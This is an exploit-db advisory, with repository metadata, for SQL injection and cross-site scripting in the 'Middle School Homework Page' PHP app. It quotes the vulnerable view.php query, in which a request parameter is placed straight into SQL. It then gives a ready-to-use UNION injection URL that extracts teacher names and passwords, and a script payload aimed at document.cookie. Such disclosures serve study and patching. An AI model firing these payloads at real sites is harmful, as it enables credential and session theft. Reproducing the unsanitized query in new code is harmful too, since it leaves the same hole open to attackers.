exploit-db-mirror/exploits/php/webapps/30786.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

37 lines
No EOL
1.2 KiB
Text

Middle School Homework Page V1.3 Beta 1 - Multiple Vulnerabilties
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://sourceforge.net/projects/mshwpage/
####################################################################
I. Sql Injection
##############
VULNERABILITY
##############
/view.php (line 3-4)
-----------------------------------------------------------------------------
<h2>Homework for <?php get_array("select * from class where
classID=$_REQUEST[class]", 'classDesc') ?> as of <?php $today = date("M j
G:i:s T Y");echo $today; ?>:</h2>
<?php
-----------------------------------------------------------------------------
#########
EXPLOIT
#########
(
localhost/mshwpage/view.php?class=null+and+1=2+union+select+1,concat(name,0x3a,pass)+from+teachinfo
II. Cross Site Scripting
localhost/mshwpage/view.php?class=<script>alert(document.cookie);</script>
####################################################################